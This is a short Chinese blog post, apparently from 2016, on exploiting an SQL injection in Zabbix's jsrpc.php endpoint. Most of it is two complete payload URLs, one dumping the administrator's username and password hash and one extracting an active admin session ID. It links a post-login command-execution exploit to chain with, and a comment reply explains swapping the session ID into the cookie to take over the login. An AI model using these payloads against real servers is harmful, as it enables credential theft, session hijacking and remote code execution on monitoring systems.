Zabbix最新SQL注射漏洞利用

freebuf刚爆Zabbix的sql注入:http://www.freebuf.com/vuls/112197.html

123

漏洞测试:

爆用户名和密码:

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

1

爆sessionid(可替换刷新登陆)

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

2

 

配合这个登录后的命令执行使用https://www.exploit-db.com/exploits/39937/

文 / admin
2 COMMENTS
  1. 2016/08/18
    0h1in9e

    替换刷新登录是种什么姿势?

    • admin
      2016/08/18
      admin
      @0h1in9e 替换cookie中的session id
LEAVE A REPLY

loading